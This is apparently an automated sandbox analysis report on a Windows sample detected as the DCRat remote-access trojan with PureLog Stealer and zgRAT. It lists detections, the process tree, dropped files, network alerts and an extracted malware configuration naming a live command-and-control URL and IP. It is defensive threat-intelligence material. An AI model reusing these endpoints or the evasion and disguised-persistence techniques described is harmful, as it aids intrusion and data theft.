Edit tour

Windows Analysis Report
vb8DOBZQ4X.exe

Overview

General Information

Sample name:	vb8DOBZQ4X.exe renamed because original name is a hash value
Original sample name:	67EFB6282221428E7FF63B87DF2F6522.exe
Analysis ID:	1579482
MD5:	67efb6282221428e7ff63b87df2f6522
SHA1:	d358efb4f979b90c159b505d374f475253d04367
SHA256:	f39e16190b3c97670dbd39c9ddada53857c38be6737d9f379b57d706292d5815
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Execution from Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to detect virtual machines (SLDT)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

vb8DOBZQ4X.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\vb8DOBZQ4X.exe" MD5: 67EFB6282221428E7FF63B87DF2F6522)

cmd.exe (PID: 7004 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tzbRZhAhjd.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7104 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 928 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

GSwhJpqdkmruXxiphyV.exe (PID: 5700 cmdline: "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe" MD5: 67EFB6282221428E7FF63B87DF2F6522)

cmd.exe (PID: 6768 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2892 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 6964 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

Conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

GSwhJpqdkmruXxiphyV.exe (PID: 7128 cmdline: "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe" MD5: 67EFB6282221428E7FF63B87DF2F6522)

cmd.exe (PID: 1608 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2336 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7016 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

GSwhJpqdkmruXxiphyV.exe (PID: 5052 cmdline: "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe" MD5: 67EFB6282221428E7FF63B87DF2F6522)

cmd.exe (PID: 6064 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1dc23k5BXS.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6168 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 6332 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

GSwhJpqdkmruXxiphyV.exe (PID: 6776 cmdline: "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe" MD5: 67EFB6282221428E7FF63B87DF2F6522)

cmd.exe (PID: 2260 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZLKnXXaim4.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6744 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6236 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

GSwhJpqdkmruXxiphyV.exe (PID: 2000 cmdline: "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe" MD5: 67EFB6282221428E7FF63B87DF2F6522)

cmd.exe (PID: 1068 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dvHErHhaAz.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5368 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 3248 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

GSwhJpqdkmruXxiphyV.exe (PID: 6880 cmdline: "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe" MD5: 67EFB6282221428E7FF63B87DF2F6522)

cmd.exe (PID: 1888 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EAk7xcglkE.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3632 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 4408 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

GSwhJpqdkmruXxiphyV.exe (PID: 504 cmdline: "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe" MD5: 67EFB6282221428E7FF63B87DF2F6522)

cmd.exe (PID: 1804 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZxWzsCgC4b.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5624 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 3340 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

GSwhJpqdkmruXxiphyV.exe (PID: 5164 cmdline: "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe" MD5: 67EFB6282221428E7FF63B87DF2F6522)

cmd.exe (PID: 1420 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xtlNdaBxkU.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1432 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 340 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

GSwhJpqdkmruXxiphyV.exe (PID: 6316 cmdline: "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe" MD5: 67EFB6282221428E7FF63B87DF2F6522)

cmd.exe (PID: 3328 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\V20VgTPM9z.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://228472cm.n9shka.top/PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife", "MUTEX": "DCR_MUTEX-hQ8SyApqqdscJx2hYL5C", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
vb8DOBZQ4X.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
vb8DOBZQ4X.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\Saved Games\OfficeClickToRun.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\Default\Saved Games\OfficeClickToRun.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\Saved Games\OfficeClickToRun.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\Saved Games\OfficeClickToRun.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\Saved Games\OfficeClickToRun.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\Saved Games\OfficeClickToRun.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\Saved Games\OfficeClickToRun.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\Saved Games\OfficeClickToRun.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1682176987.0000000000152000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1740017293.0000000012B14000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: vb8DOBZQ4X.exe PID: 6580	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: GSwhJpqdkmruXxiphyV.exe PID: 5700	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.vb8DOBZQ4X.exe.150000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.vb8DOBZQ4X.exe.150000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe" , CommandLine: "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe, NewProcessName: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe, OriginalFileName: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tzbRZhAhjd.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7004, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe" , ProcessId: 5700, ProcessName: GSwhJpqdkmruXxiphyV.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 37.44.238.250, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe, Initiated: true, ProcessId: 5700, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T15:42:38.939292+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49731	37.44.238.250	80	TCP
2024-12-22T15:42:53.548740+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49738	37.44.238.250	80	TCP
2024-12-22T15:43:08.189502+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49739	37.44.238.250	80	TCP
2024-12-22T15:43:22.798770+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49741	37.44.238.250	80	TCP
2024-12-22T15:43:34.125461+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49763	37.44.238.250	80	TCP
2024-12-22T15:43:45.126967+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49790	37.44.238.250	80	TCP
2024-12-22T15:44:10.892784+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49851	37.44.238.250	80	TCP
2024-12-22T15:44:22.377309+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49877	37.44.238.250	80	TCP
2024-12-22T15:44:36.080596+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49912	37.44.238.250	80	TCP
2024-12-22T15:44:44.986970+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49931	37.44.238.250	80	TCP
2024-12-22T15:44:53.799560+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49953	37.44.238.250	80	TCP
2024-12-22T15:45:02.612149+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49975	37.44.238.250	80	TCP
2024-12-22T15:45:11.346640+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49995	37.44.238.250	80	TCP
2024-12-22T15:45:24.971787+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50017	37.44.238.250	80	TCP
2024-12-22T15:45:42.987607+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50019	37.44.238.250	80	TCP
2024-12-22T15:45:52.331454+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50020	37.44.238.250	80	TCP
2024-12-22T15:46:05.722259+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50021	37.44.238.250	80	TCP
2024-12-22T15:46:19.488097+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50022	37.44.238.250	80	TCP
2024-12-22T15:46:32.347521+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50023	37.44.238.250	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: vb8DOBZQ4X.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\AqtFBGCA.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\dvHErHhaAz.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\1dc23k5BXS.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\tzbRZhAhjd.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\xtlNdaBxkU.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\BHGUMQKM.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\EAk7xcglkE.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\BlGuwWUx.log	Avira: detection malicious, Label: TR/Agent.jbwuj
Source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\ZLKnXXaim4.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\BuzfybGV.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\V20VgTPM9z.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\Default\Saved Games\OfficeClickToRun.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\ZxWzsCgC4b.bat	Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: 00000000.00000002.1740017293.0000000012B14000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://228472cm.n9shka.top/PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife", "MUTEX": "DCR_MUTEX-hQ8SyApqqdscJx2hYL5C", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	ReversingLabs: Detection: 71%
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\GSwhJpqdkmruXxiphyV.exe	ReversingLabs: Detection: 71%
Source: C:\Program Files (x86)\jDownloader\config\GSwhJpqdkmruXxiphyV.exe	ReversingLabs: Detection: 71%
Source: C:\Users\Default\Saved Games\OfficeClickToRun.exe	ReversingLabs: Detection: 71%
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\AGiVvpLm.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\AnBXspYe.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\AqtFBGCA.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\BHGUMQKM.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\BlGuwWUx.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\BoVNXGRv.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\BspVIDPh.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\CVklKbNA.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\CuOMrhud.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\DoxmDQeC.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\EcmNwYns.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\EzneeVJd.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\FvgOgdlp.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\FxxLTNKF.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\GTPDiSuI.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\GYueqmCN.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\HejUYCZm.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\HzekDlJr.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\IySxBMpl.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\JgaLgwjq.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\KBRTYUOn.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\KsQEGBOR.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\LLCKvMGi.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\LVVbmwlM.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\MEDBuDSi.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\MXCVunwb.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\NNotRvLd.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\NZJkwJOG.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\NZaMcRbY.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\PKGckfmR.log	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: vb8DOBZQ4X.exe	ReversingLabs: Detection: 71%
Source: vb8DOBZQ4X.exe	Virustotal: Detection: 58%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\AxYXcbrb.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BuzfybGV.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BoVNXGRv.log	Joe Sandbox ML: detected
Source: C:\Users\Default\Saved Games\OfficeClickToRun.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: vb8DOBZQ4X.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1740017293.0000000012B14000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-hQ8SyApqqdscJx2hYL5C","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000000.00000002.1740017293.0000000012B14000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://228472cm.n9shka.top/","PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife"]]

Source: vb8DOBZQ4X.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: vb8DOBZQ4X.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: *m.pdbh source: GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.2024282172.000000001C410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.2024282172.000000001C404000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2207860586.000000001C1D0000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2481680730.000000001BED5000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.3024530595.000000001CBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.2024282172.000000001C404000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2207860586.000000001C1D0000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2481680730.000000001BED5000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.3024530595.000000001CBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e089\System.pdb source: GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.3030299218.000000001CC95000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
